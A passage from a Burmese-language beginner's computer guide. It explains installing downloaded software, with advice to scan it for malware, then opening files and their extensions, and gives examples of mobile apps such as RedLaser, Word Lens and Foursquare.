ထည့္သြင္းႏုိင္ပါတယ္။ ဒါ့အျပင္ Application အမ်ားစုမွာ Installation လမ္းညြန္ခ်က္မ်ားနဲ႔ အျခားအခ်က္အလက္ေတြပါ၀င္တဲ့ Readme ဖုိင္တစ္ခုပါ၀င္ေလ့ရွိပါတယ္။
Download ျပဳလုပ္ထားတဲ့ Software ေတြကုိထည့္သြင္းလိုတဲ့အခါမွာ အဆိုပါ Software ေတြမွာဗုိင္းရစ္စ္ နဲ႔ အျခား Malware ေတြကို သတိျပဳဖို႔လိုပါတယ္။ တကယ္လို႔ အသံုးျပဳသူမွာ Antivirus Program တစ္ခုရွိမယ္ဆိုရင္ Download လုပ္ထားတဲ့ Software ကို Installation မလုပ္ခင္ စစ္ေဆးဖို႔လိုပါတယ္။

ဖုိင္မ်ားကို Application မ်ားျဖင့္ ဖြင့္ျခင္း
Application အမ်ားစုကို တစ္ခုထက္ပိုတဲ့ ဖုိင္အမ်ိဳးအစား (File Format) ေတြကိုဖြင့္ႏုိင္ရန္အတြက္ ျပဳလုပ္ထားပါတယ္။ ဥပမာအေနနဲ႔ Microsoft Word ဟာ Word Document ေတြကိုဖန္တီးျခင္းနဲ႔ ျပင္ဆင္ျခင္းတို႔ကိုျပဳလုပ္ႏိုင္ပါတယ္။ တကယ္လို႔ သင့္ေတာ္ေစမယ့္ Application အမ်ိဳးအစားမရွိဘူးဆိုရင္ File ကိုဖြင့္ႏုိင္မွာမဟုတ္ပါဘူး။ ဥပမာအေနနဲ႔ Access 2010 ေလ့က်င့္ခန္းေတြကို ေလ့လာသူေတြဟာ နမူနာ Database ကိုဖြင့္ရန္အတြက္ Microsoft Access ကိုထည့္သြင္းထားဖို႔လိုပါတယ္။
ဖုိင္တစ္ခုကိုဖြင့္ဖို႔ အဓိကနည္းလမ္းႏွစ္မ်ိဳးရွိပါတယ္။
ကြန္ပ်ဴတာေပၚမွာ ဖုိင္ကိုရွာေဖြၿပီး Double Click နဲ႔ဖြင့္ျခင္းကေတာ့ ဖုိင္ကို Default Program နဲ႔အသံုးျပဳျခင္းျဖစ္ပါတယ္။
Application ကိုဖြင့္ၿပီးတဲ့အခါမွာ Application နဲ႔ဖြင့္မယ့္ဖုိင္ကိုဖြင့္ရမွာပါ။ ယင္းကဲ့သုိ႔ျပဳလုပ္ရန္အတြက္ Application ကိုဖြင့္ၿပီးတာနဲ႔ Screen ထိပ္ဘက္ပုိင္းရွိ File Menu ကိုႏွိပ္ၿပီး Open ကိုႏွိပ္ျခင္းျဖင့္ ျပဳလုပ္ႏုိင္ပါတယ္။ ဒီနည္းလမ္းဟာ အသံုးျပဳမယ့္ Application ကိုေရြးခ်ယ္ႏုိင္သလို တခ်ိဳ႔ဖုိင္ေတြကလည္း ကြဲျပားျခားနားတဲ့ Application ေတြနဲ႔ဖြင့္ႏိုင္တာေၾကာင့္ အသံုး၀င္တဲ့နည္းလမ္းလို႔ဆိုရမွာျဖစ္ပါတယ္။ တကယ္လို ဖုိင္အမ်ိဳးအစားကိုမသိဘူးဆိုရင္ေတာ့ ဖုိင္နာမည္ရဲ့အဆံုးမွာရွိတဲ့ extension ကိုၾကည့္ပါ။ တခ်ိဳ႔ကြန္ပ်ဴတာေတြမွာ ဖုိင္ Extension ကို Hidden လုပ္ထားႏုိင္တာေၾကာင့္ Icon ေတြကိုၾကည့္ၿပီး File Format ေတြကိုဆံုးျဖတ္တတ္ဖုိ႔လိုပါတယ္။

မိုဘုိင္း Application မ်ား

Desktop နဲ႔ Laptop ကြန္ပ်ဴတာေတြဟာ Application ေတြသံုးႏုိင္တဲ့ထုတ္ကုန္ပစၥည္းေတြ မဟုတ္ပါဘူး။ SmartPhone ေတြနဲ႔ Tablet ကြန္ပ်ဴတာေတြလိုမ်ိဳး မိုဘုိင္းထုတ္ကုန္ေတြအတြက္လည္း Download လုပ္ၿပီးသံုးႏုိင္တဲ့ App ေတြရွိပါတယ္။ မိုဘုိင္း App နမူနာတခ်ိဳ႔ကေတာ့ ေအာက္ပါအတုိင္းျဖစ္ပါတယ္။
RedLaser: RedLaser ကေတာ့ ေစ်း၀ယ္ထြက္တဲ့အခါမွာ ေစ်းႏႈန္းေတြကို ႏႈိင္းယွဥ္ေလ့လာႏုိင္တဲ့ေနရာမွာ အသံုးျပဳႏုိင္ပါတယ္။ အလုပ္လုပ္ပံုကေတာ့ ဖုန္းမွာပါ၀င္တဲ့ ကင္မရာကိုအသံုးျပဳၿပီး၀ယ္ယူလိုတဲ့ ပစၥည္းရဲ Barcode ကုိ Scan လုပ္ၿပီးတဲ့အခါမွာ သင့္ေလ်ာ္တဲ့ေစ်းႏႈန္းကို App က Web ေပၚမွာရွာေဖြေပးမွာျဖစ္ပါတယ္။
Word Lens : Word Lens ကေတာ့ ဘာသာျပန္ဆိုေပးႏုိင္တဲ့ App တစ္ခုပါ။ RedLaser လိုပဲ ဖုန္းရဲ့ကင္မရာကိုအသံုးျပဳၿပီး ဘာသာျပန္ဆိုလိုတဲ့ Sign, Menu နဲ႔ အျခားစာသားေတြကို ရိုက္လိုက္တဲ့အခါမွာ အသံုးျပဳသူအတြက္ ဘာသာျပန္ထားတာေတြကို ေဖာ္ျပေပးမွာျဖစ္ပါတယ္။
Foursquare : တကယ္လို အသံုးျပဳသူဟာစားေသာက္ဆုိင္ (ဒါမွမဟုတ္) ကုန္တုိက္လိုေနရာမ်ားသို႔ သြားေရာက္တဲ့အခါ အနီးအနားမွာရွိတဲ့ သူငယ္ခ်င္းေတြကို Foursquare ကစစ္ေဆးရွာေဖြၿပီး အသံုးျပဳသူထံသတိေပးအေၾကာင္းၾကားမွာျဖစ္ပါတယ္။ ဒါ့အျပင္ Foursquare ဟာဖုန္းမွာပါ၀င္တဲ့ GPS ကိုအသံုးျပဳၿပီး အနီးအနားက စီးပြားေရးလုပ္ငန္းစာရင္းကိုရွာေဖြေပးၿပီး ယခင္ကမေရာက္ဖူးတဲ့ ေနရာေတြကိုရွာေဖြေဖာ္ျပေပးမွာျဖစ္ပါတယ္။

အစဥ္အလာအရ Application ေတြနဲ႔ မိုဘုိင္း App ေတြရဲ့ေစ်းႏႈန္းဟာသက္သာေလ့ရွိပါတယ္။ Application အမ်ားစုရဲ့ေစ်းႏႈန္းက ၉၉ ဆင့္သာရွိၿပီး အမ်ားစုကိုေတာ့ အခမဲ့အေနျဖင့္ပါ ရရွိႏုိင္ပါတယ္။ တကယ့္လိုအသံုးျပဳသူရဲ့ မုိဘုိင္းထုတ္ကုန္ဟာ အင္တာနက္ခ်ိတ္ဆက္ထားပါက App ေတြကို မိုဘုိင္းထုတ္ကုန္ေတြေပၚကို တိုက္ရိုက္ Download ျပဳလုပ္ႏုိင္ပါတယ္။ ဒါမွမဟုတ္ ကြန္ပ်ဴတာေပၚကို တိုက္ရိုက္ျပဳလုပ္ၿပီး မိုဘုိင္းထုတ္ကုန္မ်ားထံ လႊဲေျပာင္းႏုိင္ပါတယ္။

Ref: Myanmar Internet Journal

Related Posts Plugin for WordPress, Blogger...